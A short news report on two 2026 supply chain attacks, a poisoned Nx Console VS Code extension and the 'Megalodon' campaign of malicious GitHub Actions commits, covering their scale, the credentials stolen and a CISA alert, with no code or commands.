How the Attacks Worked
A sophisticated pair of coordinated supply chain attacks have put millions of software developers on alert. Threat actors exploited trusted developer tools, including the Nx Console VS Code extension and GitHub Actions workflows, to steal credentials, cloud tokens, and source code. In one campaign, a poisoned version of the Nx Console VS Code extension, version 18.95.0, was pushed to the Visual Studio Code Marketplace. The extension had over 2.2 million installations, making the blast radius enormous. Analysts discovered that a GitHub employee’s device was among those compromised, leading to the unauthorized exfiltration of roughly 3,800 internal GitHub source code repositories.
The Megalodon Campaign
A parallel campaign, called “Megalodon,” ran simultaneously. An automated attacker pushed 5,718 malicious commits to 5,561 public GitHub repositories within a six hour window on May 18, 2026. These injected GitHub Actions workflows harvested CI/CD secrets, cloud credentials, SSH keys, and OIDC tokens, sending everything to a command and control server. The attackers first stole a contributor’s GitHub personal access token through a prior supply chain incident, then used that token to plant a hidden orphan commit containing an obfuscated JavaScript payload inside the official nrwl/nx GitHub repository. Analysts at CISA identified the full scope of the threat and published an urgent alert, noting that organizations should treat any machine that ran the compromised extension as fully compromised.
Source: Cyber Security News
